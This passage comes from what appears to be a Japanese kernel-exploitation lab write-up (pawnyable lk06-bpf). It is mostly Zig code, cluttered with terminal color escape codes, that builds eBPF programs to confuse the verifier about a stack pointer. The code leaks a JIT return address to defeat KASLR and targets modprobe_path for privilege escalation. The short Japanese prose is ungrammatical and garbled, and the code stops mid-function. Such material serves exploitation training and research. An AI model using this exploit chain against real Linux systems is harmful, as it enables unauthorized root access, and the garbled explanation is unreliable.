eBPFのヘルパーを呼び出す命令はJIT後にx86の�[40m`call`�[49m命令になる:この命令と命令のアドレスをリークす
ればそのヘルパーのアドレスを割り出せるそしてカネールのベスアドレス分かりできた。
eBPFのヘルパー[^fn:9]を呼び出す時に復帰アドレスはスタックにプッシュする。
偽�[40m�[35m`sk_buff`�[39m�[49mをスタックに作ると�[40m�[35m`skb_load_bytes
`�[39m�[49m利用したら、スタックから復帰アドレスを読みできる(注記:スタックのアドレス一歳リークしてない、eBPF
JITしたプログラムのアドレスをリークした)。
�[1m�[36m<<�[0m�[1m�[37mpawnyable�[0m�[1m�[36m-�[0m�[1m�[37mlib�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[36m<<�[0m�[1m�[37mlk06�[0m�[1m�[36m-�[0m�[1m�[37mbpf�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mMODPROBE_PATH�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff81e37fe0�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mBPF_USER_RND_U32�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff810e4590�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mcall_decoder�[0m�[1m�[37m(�[0m�[1m�[37maddress�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37minsn�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[36mu8�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mbuiltin�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@import�[0m�[1m�[37m(�[0m�[33m"builtin"�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m.�[0m�[37massert�[0m�[1m�[37m(�[0m�[1m�[37mbuiltin�[0m�[1m�[37m.�[0m�[1m�[37mtarget�[0m�[1m�[37m.�[0m�[1m�[37mcpu�[0m�[1m�[37m.�[0m�[1m�[37march�[0m�[1m�[37m �[0m�[1m�[36m==�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mx86_64�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mdebug�[0m�[1m�[37m.�[0m�[37massert�[0m�[1m�[37m(�[0m�[1m�[37minsn�[0m�[1m�[37m[�[0m�[1m�[36m0�[0m�[1m�[37m]�[0m�[1m�[37m �[0m�[1m�[36m==�[0m�[1m�[37m �[0m�[1m�[36m0xe8�[0m�[1m�[37m �[0m�[33mand�[0m�[1m�[37m �[0m�[1m�[37minsn�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m �[0m�[1m�[36m==�[0m�[1m�[37m �[0m�[1m�[36m5�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[36m0xffffffff00000000�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m((�[0m�[1m�[37maddress�[0m�[1m�[37m �[0m�[1m�[36m+�[0m�[1m�[37m �[0m�[1m�[37minsn�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m+%�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37mbytesToValue�[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37minsn�[0m�[1m�[37m[�[0m�[1m�[36m1�[0m�[1m�[37m..�[0m�[1m�[36m5�[0m�[1m�[37m]));�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mexploit_prologue�[0m�[1m�[37m(�[0m�[1m�[37mmapfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m26�[0m�[1m�[37m]�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr6�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mst�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mld_map_fd1�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mmapfd�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mld_map_fd2�[0m�[1m�[37m(�[0m�[1m�[37mmapfd�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x8�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mcall�[0m�[1m�[37m(.�[0m�[1m�[37mmap_lookup_elem�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mjmp�[0m�[1m�[37m(.�[0m�[1m�[37mjne�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m2�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mexit�[0m�[1m�[37m(),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr9�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mldx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr9�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mrsh�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m32�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mlsh�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m32�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37malu�[0m�[1m�[37m(�[0m�[1m�[36m64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mmov�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mi32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@bitCast�[0m�[1m�[37m(�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0xfffffffe�[0m�[1m�[37m)))),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mlsh�[0m�[1m�[37m(.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m32�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37malu_or�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr2�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// R1 \in [1, 0] = 1�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mldx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr9�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mjmp�[0m�[1m�[37m(.�[0m�[1m�[37mjle�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m2�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mexit�[0m�[1m�[37m(),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// R2 \in [0, 1] = 1�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr2�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37malu�[0m�[1m�[37m(�[0m�[1m�[36m32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mmov�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37msub�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mstx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mfn�[0m�[1m�[37m �[0m�[37mexploit_stack_confusion�[0m�[1m�[37m()�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m155�[0m�[1m�[37m]�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// results are stored in r7 (a frame pointer that the verifier thinks points to fp-0x18 but doesn't) and r8 (a frame pointer that points to the same place as the corrupted frame pointer but it is consistent with the verifier)�[0m
�[1m�[37m �[0m�[33m// in other words, use r8 to load a malicious value, load the innocent value into r10-0x18, and load from r7 to get type confusion�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mret�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m155�[0m�[1m�[37m]�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37m_insns�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mcomptime�[0m�[1m�[37m �[0m�[1m�[37mblk�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37minsns�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37m.{};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37minsns�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37minsns�[0m�[1m�[37m �[0m�[1m�[36m++�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// load fp-0x18 on the stack�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x20�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mstx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x18�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr6�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[33m// skb->data == "foobared\x00\x08"�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// 8 bytes before the last byte of the to-be-corrupted stack pointer�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr3�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr3�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x20�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// r4 (expected: 0x8, actual: 0x9)�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mldx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr4�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr4�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0x8�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mcall�[0m�[1m�[37m(.�[0m�[1m�[37mskb_load_bytes�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// r7 = (fp-0x20) - [0, 0xf8]�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mldx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr7�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x18�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// zero out the stack�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36m1�[0m�[1m�[37m..�[0m�[1m�[36m0xf8�[0m�[1m�[36m/�[0m�[1m�[36m8�[0m�[1m�[36m+�[0m�[1m�[36m1�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37m_i�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mi�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi16�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@intCast�[0m�[1m�[37m(�[0m�[1m�[37m_i�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37minsns�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37minsns�[0m�[1m�[37m �[0m�[1m�[36m++�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mst�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x18�[0m�[1m�[36m-�[0m�[1m�[36m8�[0m�[1m�[36m*�[0m�[1m�[37mi�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37minsns�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37minsns�[0m�[1m�[37m �[0m�[1m�[36m++�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[37m_�[0m�[1m�[37m]�[0m�[1m�[37mBPF�[0m�[1m�[37m.�[0m�[1m�[37mInsn�[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// load a special value somewhere on the stack�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mldx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr9�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mstx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr7�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[33m// r1 == 1, but the verifier doesn't know that�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// special case for if the pointer was left unchanged�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mldx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x20�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mjmp�[0m�[1m�[37m(.�[0m�[1m�[37mjne�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m14�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// this will always result in r7 being (expected: fp-0x20, actual: fp-0x18)�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x20�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mstx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x18�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr1�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr1�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr6�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr2�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m1�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[33m// now the last byte is 0x8, not 0x0�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr3�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr3�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x20�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mldx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr4�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr4�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0x8�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mcall�[0m�[1m�[37m(.�[0m�[1m�[37mskb_load_bytes�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mldx�[0m�[1m�[37m(.�[0m�[1m�[37mdouble_word�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr7�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x18�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37mmov�[0m�[1m�[37m(.�[0m�[1m�[37mr8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mr10�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[37madd�[0m�[1m�[37m(.�[0m�[1m�[37mr8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m-�[0m�[1m�[36m0x18�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
